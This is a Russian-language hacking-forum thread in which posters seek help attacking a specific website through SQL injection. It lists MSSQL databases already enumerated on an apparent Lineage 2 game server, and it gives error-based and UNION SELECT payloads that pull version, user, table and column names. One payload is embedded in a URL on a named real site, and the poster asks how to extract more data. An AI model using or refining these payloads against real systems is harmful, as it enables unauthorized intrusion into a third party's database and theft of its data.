переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.
переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.
Нашёл багу, всё стандартно "You have an error in your SQL syntax",но при подборе столбцов order by вместо Unknown column '100' появляется Unknown column 'foto2' in 'field list'.
Как быть?
Последний раз редактировалось Imperou$; 15.03.2009 в 17:20..
С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world
версия - 1 or 1=@@version--
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблицы'))--
Проблема в том что запросы такого видв не проходят.
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6, 7,8,9,0,11,12--
Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
Плиз скажите как с ними работать и что полезного и как из них взять.
Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.